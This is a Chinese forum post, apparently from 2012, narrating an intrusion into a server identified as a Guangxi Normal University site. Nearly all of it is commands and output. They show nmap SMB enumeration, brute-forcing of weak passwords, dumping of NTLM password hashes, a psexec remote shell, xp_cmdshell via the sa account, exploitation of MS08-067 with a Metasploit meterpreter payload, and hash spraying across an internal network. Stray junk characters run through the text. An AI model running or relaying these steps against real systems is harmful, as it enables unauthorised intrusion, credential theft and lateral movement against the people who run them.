广西师范网站http://202.103.242.241/
, @; |" ^* }7 _5 l$ w3 t- w2 x, }# C" @
root@bt:~# nmap -sS -sV 202.103.242.241
' L; U" m6 @' z7 K/ L6 l. L3 A5 ^; _' ~4 v4 j; a m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST
& }9 _) J, v! e6 [: L
) q# c; W9 |, W0 MNmap scan report for bogon (202.103.242.241)2 j0 r0 U+ [5 Z( P6 G! _1 p
. e# A& U- Z) O3 N
Host is up (0.00048s latency).
( N% i$ U8 c8 W; v1 I( j( S) H! W" a, G& m5 N
Not shown: 993 closed ports
7 G( X+ y, s( Q: r. t$ |3 E9 T g
]1 N& i2 T9 I/ @# sPORT STATE SERVICE VERSION& C/ i( S! S# \5 h+ X% G
& H2 P4 N" L2 M( ~2 ~135/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)* ~7 K/ y; e& t+ x! r
5 z% U J, I# y) y0 s139/tcp open netbios-ssn: P. ?) k" O" t7 X- a; G/ W! G9 h- m
6 H: K# U# Z3 {( J& _( R1 y
445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-ds
! y& W- U% k1 |' Y8 F; T* t+ f, g& Z5 \/ ]( |" {6 N8 w' X
1025/tcp open mstask Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)4 `( W% J. ~# P8 }
9 `* ]7 U. | P: e: y. O' ^( s1026/tcp open msrpc Microsoft Windows RPC
( p. k* P- I2 U; N1 C. h/ k* o" V1 @. `1 l* f3 \: `3 k
3372/tcp open msdtc?
# ^ l( E' n6 M' Q: H+ x9 _
7 z! A$ p9 |/ L6 @3389/tcp open ms-term-serv?6 h, t6 n I: Z. Z
" Q8 E- a3 _( d0 V6 G8 k/ \2 c# X
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
& X, Y. c9 G& C6 i1 W: o- ]9 WSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
& s9 Y2 R- e6 J. x! v' f% r" k! E3 j s e
SF GetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
- }5 z0 M0 K2 C* l8 b
* S F. ]. f4 {+ {6 NSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
* p. M- W. O; ]0 y7 Q/ c4 g) ^
2 a+ i( W/ j3 F: W- s2 LSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
y7 s- W* s9 ?! N) F% n! B6 O" L8 q8 H
SF:ptions,6,”hO\n\x000Z”);( x1 \, M8 F% ~
& o. a9 s1 ^" ]7 }
MAC Address: 08:00:27 7:2E:79 (Cadmus Computer Systems); C+ `4 L) i7 K7 ]5 z
2 Q0 f* ^' n7 \, T: R
Service Info: OS: Windows
( A6 b6 f2 \8 J
$ P% r6 |: p* p2 j4 N0 _4 qService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
3 z! O/ f. R( u8 S1 A
9 _+ T& L3 M, L4 V* \8 uNmap done: 1 IP address (1 host up) scanned in 79.12 seconds
; F: H4 l* E8 _; V( Y
% W5 n: T- M, _5 j9 f- Q, @% Froot@bt:/usr/local/share/nmap/scripts# ls -la | grep smb //列出扫描脚本3 ]" C# F( q' j
# k. B: |! v* ?5 B R
-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse) i$ G6 R* V1 W; L
# @0 q9 b# Z) \& |
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
7 D. A1 b3 c% G! c6 y5 g
5 y# X' H' D' _, V- t2 k-rw-r–r– 1 root root 4806 2011-07-09 07:36 smb-enum-domains.nse
) T3 N1 K; @' ?( A" U X$ R
# i' z4 x$ ~( O# `6 U) A0 [) S: A-rw-r–r– 1 root root 3475 2011-07-09 07:36 smb-enum-groups.nse
9 {2 v3 y8 H* J, d/ U2 X7 F1 c& A4 V5 c2 U- p4 l( X
-rw-r–r– 1 root root 7958 2011-07-09 07:36 smb-enum-processes.nse6 }& V c6 ?( N3 C
$ ~3 Q0 z {1 T5 S
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
, Y7 Q/ Q( V8 f- }4 f6 Y% `* {/ J% V' f$ w/ @4 d, i2 G/ S
-rw-r–r– 1 root root 6014 2011-07-09 07:36 smb-enum-shares.nse& g) }: l5 q3 C' L$ V
: ]1 S2 h0 {/ @- C0 v% _-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse
) J5 T% z1 t/ Y+ `0 x6 V- p( x; g. r7 D
-rw-r–r– 1 root root 1658 2011-07-09 07:36 smb-flood.nse/ B7 y: d# R" h
, ~5 M' S1 g& R B7 q' K, y-rw-r–r– 1 root root 2906 2011-07-09 07:36 smb-os-discovery.nse
; B& m$ K( T. y$ ~) _ M% g4 e( d& ~6 c0 L# a2 T
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse
" Y9 \4 |: s7 ]3 p# b& r: \6 ~1 }* s% O2 w4 Q9 `5 R1 n: `# W
-rw-r–r– 1 root root 4362 2011-07-09 07:36 smb-security-mode.nse
! Y# s" P$ k0 l
# Q: {# r: D$ e$ |5 Q' u, m+ O-rw-r–r– 1 root root 2311 2011-07-09 07:36 smb-server-stats.nse3 ] ~4 W6 L) t5 G4 a
' W. P) Y7 f0 |3 G( g* q
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse; B8 V9 m" B( Y" U
& T! {6 k) H2 H3 | h( W-rw-r–r– 1 root root 1429 2011-07-09 07:36 smbv2-enabled.nse
% | h4 g8 {" V6 a" Z, r: L& ]% g$ |1 U9 A* N8 K' ^5 H# @9 W$ j
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241
; w) m8 \7 ]( ?2 q7 ?- f6 ~/ M. g+ ~& q" G/ B# o7 V8 A
//此乃使用脚本扫描远程机器所存在的账户名, D7 \8 e7 x, b) ^- f
" l( g6 v! U3 S6 Z8 X/ ~& j2 @
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
& @! ]0 F* i [* \+ [, U- c1 w9 R4 W7 v" }% Z
Nmap scan report for bogon (202.103.242.241)1 s! i# a N& k1 v* k2 P+ f
' D0 n( g# N: x$ P5 uHost is up (0.00038s latency).2 u' t) X* i* G" q: y4 g
3 M+ {; {$ b5 l% ~( ONot shown: 993 closed ports3 y& F K" W4 x" I+ |1 P- ], \
' ?- H- t' o) ?7 V* X1 b* W
PORT STATE SERVICE$ `$ r( y; ~; F9 g: N
6 Q) u- p: w, J7 D& A135/tcp open msrpc, b& H' d$ U5 Y. L$ L; u, m, L
7 V3 h/ T4 [6 }, [3 k/ E139/tcp open netbios-ssn
3 A: |: S8 x3 q5 i. y! u7 Z! T# N( g/ Q5 F9 N- k9 \9 G$ h
445/tcp open microsoft-ds% {0 D) Z) N' P8 n% X2 ~: s6 [3 ^
& D; D( ?: O. J% B. o* `
1025/tcp open NFS-or-IIS' s5 b7 c5 f, p I
. [9 e+ p; { c: u6 v2 c
1026/tcp open LSA-or-nterm
% z' U4 m7 a( y3 ? M6 _0 r7 O+ \1 |: P* V
3372/tcp open msdtc
! P2 b ]; ^; ]" Y% w" m
3 }. c8 l* B5 M+ a8 r+ u; j3389/tcp open ms-term-serv2 a0 u* l5 u2 m
& V5 S% T$ d! [6 b4 [, ?/ l6 mMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
# i+ D5 `" H: A$ u7 m. k& @) ?0 i4 b% {6 f
Host script results:
( o+ Q2 T+ W3 _5 W. e e/ [7 z9 E6 q' n* ~6 g2 J' P8 v6 \
| smb-enum-users:6 v/ {" K! N8 }9 h/ g
. B9 X+ G' x$ }- e! H! u% V|_ Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
( u5 ?# \3 l1 \4 I6 K- O D3 h, c" ]2 n( | G) e5 J
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
) o6 d4 h7 g% [( }* ~' B& q& `' i8 a1 U% a; `$ o3 R- _. V+ D+ [
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 ( C! Z( N: O; K4 X9 V/ ]# \9 Z
) [2 Y" ?- ?* s. t1 i//查看共享
: y; F2 U! J9 }/ i( e
1 I1 ?% G4 p G4 ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST* W8 n5 C; M9 g
0 A; q" {* A$ C5 j7 M9 J
Nmap scan report for bogon (202.103.242.241)1 }# K/ h3 O* K1 B, S2 ?. Y1 _
. {, }1 v7 {2 C: Y5 r9 Z# vHost is up (0.00035s latency).! k! n; p1 s1 E) Y0 O" w+ c
: r2 W) k. a1 s; p) v) V, K: J* Y: wNot shown: 993 closed ports
) p2 {2 c, O( h) U6 J+ \0 S8 {9 ]( {8 B! i8 i( N# g; p: v
PORT STATE SERVICE
% x* |% {) _) K) E8 H5 `
6 R* q/ S2 O9 B5 k0 L9 }* @135/tcp open msrpc. V/ @2 j1 K4 F6 D1 K4 N: O
" l( f7 M$ @/ ^8 l7 t
139/tcp open netbios-ssn
) e: z7 `# n( E L- \7 G- Q& y$ Q; M% N
, [" y* T# s& P' A% }9 p$ i445/tcp open microsoft-ds$ p3 u1 F' ~. i: G) V# z
1 y8 ^3 ~) a0 F1025/tcp open NFS-or-IIS
; Y! D$ h+ m* R9 e; O" J, j- k$ _- C e, [( Y
1026/tcp open LSA-or-nterm8 E. u- A; M' `( n( o; z$ n: |5 y7 k
0 j0 I4 ^% d! K' Z* {( i' ]" B3372/tcp open msdtc- b9 B! }" }1 o M) F3 i2 }
0 x/ Q' K p) a" q! ?3389/tcp open ms-term-serv" ?3 t# O" `" ^3 Q- v' O3 q
9 n1 a3 d- k# \( e1 l* Q. C
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
3 T) V0 t) Y5 s* s, ]: o$ v0 X/ E' i5 \
Host script results:6 W( N! H9 ]$ l+ L: P8 K- @
, L) S5 o1 g3 ]8 M; e; i6 {- v. Q# n| smb-enum-shares:
7 B5 ^" ^' }# S/ G" }( a, m7 p3 V' P0 I1 t# r: i" O+ x
| ADMIN$* d2 D/ ~' t* l0 k" x! F5 k
2 L2 H3 V) Q0 N, O| Anonymous access: <none>
9 x) |9 I, A' f* U! ?7 u* N( Z
3 W+ ~; V8 y( d# c* E! |8 H| C$
+ M% k5 |' J0 l) W7 m8 x, l: } J! N; k, k
| Anonymous access: <none>% o2 k' g, [8 P7 H% M
) \ k+ L7 s9 O
| IPC$9 F$ i5 |% _! H8 [6 c3 X
$ q9 P2 L0 t5 Z% u
|_ Anonymous access: READ
Q, S$ ?3 K/ G! A# q' X& G# x/ Z% [! b9 u4 `. H
Nmap done: 1 IP address (1 host up) scanned in 1.05 seconds& L1 P" S- M+ |& l7 R" W
% g8 \6 d @8 e p5 Z; ]
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241 / D5 }2 O2 c W+ s& D k$ q
( y! f; d" ?" F' a" D
//获取用户密码5 m& c- B) v- m! H2 ^1 O& C
* _. @6 m# x5 k" k9 _. z! SStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST
' u6 D0 V" Q% E, v& \5 C! h" e: F6 I+ k/ @& V( o4 _
Nmap scan report for bogon (202.103.242.2418)0 Y# k" v Y' O8 G. y) W9 H
4 ?5 j E, ^) K4 h3 O+ @
Host is up (0.00041s latency).
4 s% B! T0 a& [ [
* |- @6 l- `2 BNot shown: 993 closed ports
/ C; w6 @ o8 j0 W* T+ {* E- d& q' `$ j# M2 N) X. S5 |
PORT STATE SERVICE
* P8 _# ^1 w" P2 o" J0 q( u0 d
135/tcp open msrpc$ M, y" L, d5 T; q( Z6 Y
' s% Y8 x' \: \! B* `
139/tcp open netbios-ssn
- x* d* V( [: U0 J; T5 x' e8 K. e& H p0 R- ~
445/tcp open microsoft-ds: e4 h3 S. R7 S, C; C* Z
$ I) h/ E" m2 N$ h4 b5 o; z1025/tcp open NFS-or-IIS6 Z, l6 ^5 ~6 n6 B v2 W D+ |
2 |$ P, C& \" }) G: L1026/tcp open LSA-or-nterm9 P% k6 m5 J+ [: Y( v/ [
4 T" u* F1 w' ~- J8 o, ~6 X3372/tcp open msdtc B! v" x# R W5 G
, g# ~$ m9 P( x: |5 w3389/tcp open ms-term-serv" x5 K0 u' z8 M& `! a
4 P; M' ]2 X4 v9 W6 K2 u! |" X
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
& T. w$ U5 v# d- a# ^9 \8 P8 G
, R0 j/ g% E' s3 V6 XHost script results:3 N0 t% V. P3 t( c" {9 m5 |
9 t% D" E& w! o' \. F- w
| smb-brute:' ` M$ s3 a6 Z6 Y" y
" j5 T4 r M; W
administrator:<blank> => Login was successful3 A' L6 }! F5 m7 _+ t. |+ O
4 n9 @4 G4 k, _6 g$ d|_ test:123456 => Login was successful8 }, X" }) T7 O- A% K5 O
3 M# N% p9 ]3 R& g/ n; f$ i7 q
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds
. @8 T; }5 r8 Q) F
) k) C2 X1 l- G; Jroot@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash- V2 U+ I1 j" e9 ]% Y2 ]4 G- y n
, q% ^* z, W6 C' C6 p. |root@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data; V& |8 j7 _; T
. |5 c' F2 r F" ?
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse
- J% z- [9 l/ @0 D0 V/ b4 [2 h) E: _% ]; F
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139- {: p5 v9 L- V1 L
- W6 n+ u* p- d' \: M* gStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST
; t" b" G& d: ?& g# m2 i8 x% Y$ r! Y- T# K! o8 H
Nmap scan report for bogon (202.103.242.241)" H& X& ?! f# ~7 b% R
' o5 m( x3 N& s1 |: K" x
Host is up (0.0012s latency).( P0 G9 v. X4 C5 w# v* k
6 N9 o4 T" ]' ^. k: G O8 N
PORT STATE SERVICE( M0 o. R( x# U$ X6 l4 C' u b
1 {" f" i+ |6 S2 E. P7 y9 o: q135/tcp open msrpc7 t7 Z7 [7 Y1 ]
8 x6 [; e( c9 ]( l' X9 T# U139/tcp open netbios-ssn
; |% J& j3 `6 T( Z" D4 N
* i" i6 A$ c8 a7 d$ F( y445/tcp open microsoft-ds- @7 N5 ~3 x/ F! D* S* x+ _( t
$ R# @6 y G/ m0 U6 w- D' PMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems). Q+ j+ A# u. }3 X; a Q. o
2 }1 p+ l7 f; G [' J# vHost script results:, n. |) @* V" ^5 a M
8 }( b1 I& u1 W" Z) A) t| smb-pwdump:% b" f0 a- g6 m6 m
- c7 V+ t$ x2 A/ n
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************1 P7 w H1 x [& W5 B/ D: {
+ `3 H* ~% J' n8 t& p' w, }& n| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************
8 [" V: [/ B$ @% J; _( p$ y" Q" [3 V9 R, Q/ z! T, M5 b. u
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
- `4 l6 A" ]: c
9 [5 [" e7 w g( k/ X$ G F7 O8 M|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2
4 l: }2 r& R; q8 ~) E; ? J( r' c$ P% V3 a
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds
1 r3 {- b2 ~( {; n1 c- O' b$ q& v: A+ ]5 j1 T6 L0 }
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241 -u test //获取一个cmdshell
! F5 X- _( | @7 d, a3 N
: Z! s; q7 ?1 C. I-p 123456 -e cmd.exe1 e% L6 C# P& s! t( N# m/ o/ m
/ r4 J, Z% q; K( uPsExec v1.55 – Execute processes remotely
% D# j9 j7 Q1 k$ w4 [: R
8 q$ R+ D8 \6 n0 d8 ACopyright (C) 2001-2004 Mark Russinovich
% v# y/ T0 k5 ?; i* D7 ]! w" l: x+ x8 `1 [6 o3 j0 o# |- S0 \3 W
Sysinternals – www.sysinternals.com# ]) Y" _' V3 j9 D% a6 v5 h% _8 t
- @2 q. Y) W) l$ S; ~) L! EMicrosoft Windows 2000 [Version 5.00.2195]
! S7 c* }5 f5 T7 D9 S5 l& n: W; H2 X' v9 S4 ]3 I. Y
(C) 版权所有 1985-2000 Microsoft Corp." v; _( W* d5 V1 P0 n" Y6 L
" r7 j2 ~ F! t3 i+ g% k
C:\WINNT\system32>ipconfig
6 k7 Y# Q& N& Y* c4 q; R. q8 c& g; L( y @
Windows 2000 IP Configuration
2 P5 X, I. z. F3 R0 v6 Z' f# c% x5 C. T, A A) [% [
Ethernet adapter 本地连接:9 V& N! R! Q; F5 P8 g6 B- A
) U Q' H+ Y' ]0 d. Z4 \7 K
Connection-specific DNS Suffix . :8 I' d+ p1 I% ~. c2 W
( R6 s2 b1 h6 x0 s' y6 [5 KIP Address. . . . . . . . . . . . : 202.103.242.241
% Z* F" R1 W3 U$ d/ W3 A7 j+ W+ K4 E( T) U; W2 y U/ M# M! @0 g
Subnet Mask . . . . . . . . . . . : 255.255.255.0
9 Q' S0 R8 ]6 R+ C/ n+ B, ^8 b& ]5 K7 K
Default Gateway . . . . . . . . . : 202.103.1.1
G# @ W: S" M/ y# X* w
$ z3 y `0 A1 Q) x) d% ] W7 SC:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “ //远程登录sa执行命令
, b& _ z3 }, A, G' f# b
) p. F7 Z0 y* D' u2 V% `* _! mroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241 //检测目标机器漏洞 z. Z# y/ n3 G% O
) w6 ^/ V( w/ l/ B
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST8 B* F7 h1 C! U$ O5 z$ c( f$ X; M
) l# B6 i8 b# V0 t# nNmap scan report for bogon (202.103.242.241)
4 _3 u* T# c7 T; ~) [; x( U) l, h9 E& [/ B6 G
Host is up (0.00046s latency).
# l2 N- r$ W+ q& P! ]) h
Z; q. o! D- V9 L. lNot shown: 993 closed ports. _+ ^0 l2 p) Y
$ {9 N( h- z+ b: W3 z# R2 gPORT STATE SERVICE, n4 N: t4 z4 V! g; b0 D6 O
% L7 ?0 J* N' J. M135/tcp open msrpc! U& u, Y- l; L0 \. B7 p S
& v# R- F% Q/ J) k: O/ F/ T
139/tcp open netbios-ssn
% p2 O, J/ R( O1 y6 Y, V; i3 g
% D8 i6 _: m4 c) L4 { d2 o/ y445/tcp open microsoft-ds
6 T7 w( e# @- R# u9 d5 }3 e5 u/ \( e$ W0 J
1025/tcp open NFS-or-IIS6 i" D# S% |' x% J$ o! R$ b
, T; L& t2 u8 C* \" Q+ V& x- S7 L+ w1026/tcp open LSA-or-nterm
# X9 X$ G4 H5 e$ A2 c v! G$ a7 v' r+ {! p8 s1 s x
3372/tcp open msdtc/ g& S$ V9 Y2 r/ P! O$ b5 Y: f
! ?: m% C- k) Q
3389/tcp open ms-term-serv
6 ], F. s6 w) U3 H9 M1 S! a. H) i5 {4 K) p9 i( |
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
. K, j, v* i7 k: { t
3 p( `+ F" l- _! o9 d9 `2 UHost script results:, ]# g6 J7 Q# B' \. U
$ [& n( \0 Z, C3 `8 k) G
| smb-check-vulns:
/ W: ~- S. p# {1 _* w& E3 b7 c3 y! b1 e7 c1 ~; N
|_ MS08-067: VULNERABLE
$ s: M1 \' B& v$ @( |, T7 t; S
8 I, }% Y: J* Z! n FNmap done: 1 IP address (1 host up) scanned in 1.43 seconds
' b1 @( _# E+ r0 z; [$ d r0 n
U# A9 d! F; P" A! y8 l3 Croot@bt:~# msfconsole //在msf上利用ms08-067漏洞对目标机器进行溢出) ?% H; V s6 h# [& a
! I* q! _) [) m9 y) H
msf > search ms088 a3 z; Y- m: T( I( q0 B
* U% \* e/ h! w$ n' h( G) o; lmsf > use exploit/windows/smb/ms08_067_netapi
4 G- o3 p5 F5 Y. x2 \, L: P6 o( }8 f3 {1 L% {3 m0 s: \" [
msf exploit(ms08_067_netapi) > show options
" ~& p9 y" R: I- O, L1 O! m
6 R5 J+ Q" _+ M1 k' [msf exploit(ms08_067_netapi) > set RHOST 202.103.242.241* o0 z C7 j" {' R' _7 G2 o
' P( s4 d! W8 f: B( I- G, M6 @% J2 ^msf exploit(ms08_067_netapi) > show payloads
; D1 f, |5 h9 z' l+ |. ?9 l; | p
, p! }& ~9 ~1 p2 Vmsf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp
4 {& C7 n4 z5 i9 k' u* X& c1 m0 ?
1 Z8 i6 B. ]" T+ w4 m5 ~msf exploit(ms08_067_netapi) > exploit
. A& x3 e4 ?5 H6 }+ N( w. p" g" x8 y0 x
meterpreter >& P" t; B7 p: i+ z$ }
" V# z4 e: w+ H; M
Background session 2? [y/N] (ctrl+z)9 r- ^) F# i. r& E0 u2 Y) A& ^
& d. B, B7 ~# r3 |msf exploit(ms08_067_netapi) > sessions -l2 o c* a9 I2 L! D. m
; K' i' ]2 T/ h3 F, o8 W2 v5 K( G
root@bt:/usr/local/share/nmap/scripts# vim usernames.txt8 ]' p! `1 ~ `) L' I
5 A' {% [( D( X6 j2 w2 vtest
6 M$ V [/ k0 `( ~
3 C2 b5 p/ N9 N0 L. Badministrator
8 ^" J# F+ ?3 W4 w2 Q3 m4 f" l0 r& e; }
root@bt:/usr/local/share/nmap/scripts# vim password.txt
6 C: n9 S# X3 h7 o8 A5 K. W# W1 @
& d( p$ j3 Y0 F, f44EFCE164AB921CAAAD3B435B51404EE
. G0 V/ f0 w- P i
) h- H4 c$ l" g2 b) K6 R: Nroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
* O: i; R$ z: M7 `, D
. J6 H7 X7 [% s0 Y- P0 K9 H- T //利用用户名跟获取的hash尝试对整段内网进行登录" R/ a- x5 x3 y& |
! P+ U) Z, ^; }1 H; E" f# J1 v8 q0 }Nmap scan report for 192.168.1.105
N8 D5 p7 k3 i% Q r$ ]+ H* ~* C$ h8 {
Host is up (0.00088s latency).; F2 X+ |' k7 K- G' n' ]! }2 ]
2 d8 ]3 Z' E' z( z qNot shown: 993 closed ports
7 {6 d* g2 i# A/ v+ i& o' H; F5 C% W
PORT STATE SERVICE
# q& s7 T3 J4 {+ t* i( w: @$ k& {' L
5 v* O' ^* H" {! A$ W& e135/tcp open msrpc
% _+ Q; o+ p$ m; ? Q: J
" k; X" U5 E Q7 L) ?# a139/tcp open netbios-ssn+ {6 h6 @$ t* D! v3 W
F- Z" Z7 k6 {9 h1 h- q
445/tcp open microsoft-ds" l p$ p/ n( [* }* ^, @" d
6 F" T, h$ r* [/ r1025/tcp open NFS-or-IIS) ~8 d( q7 ]5 d1 ?- {2 j {: }# z
- B) c/ n" G9 E& f& |& \ C1026/tcp open LSA-or-nterm
8 p- a' _8 S7 `0 ~3 N" [% J7 C$ U$ u4 G+ e
3372/tcp open msdtc0 y1 x1 S, `1 T
3 x, }8 e- Y- C, ?5 e/ x5 n) Q* Z
3389/tcp open ms-term-serv! k' H0 a/ y, ]- G
0 A+ E7 c7 j) G- V8 j, Y/ A, \
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
' l, t8 V# B+ T) k" P* `. Z* r- d! y) g; o/ e
Host script results:5 K+ r: r1 }& P: ~2 J
7 U, v5 z ^: X9 d
| smb-brute:3 C* G* g2 g* S, t9 Z
1 u6 E2 B% S! B( `8 ~
|_ administrator:<blank> => Login was successful9 w% ?& q, S, Q/ t
: z7 Y o; R5 C; p( |8 Z
攻击成功,一个简单的msf+nmap攻击~~·4 h; u. S: n2 @+ m
& \( C' a: U- a, h6 ?, @ |
发表于 2012-12-4 12:46:42
收藏
支持
反对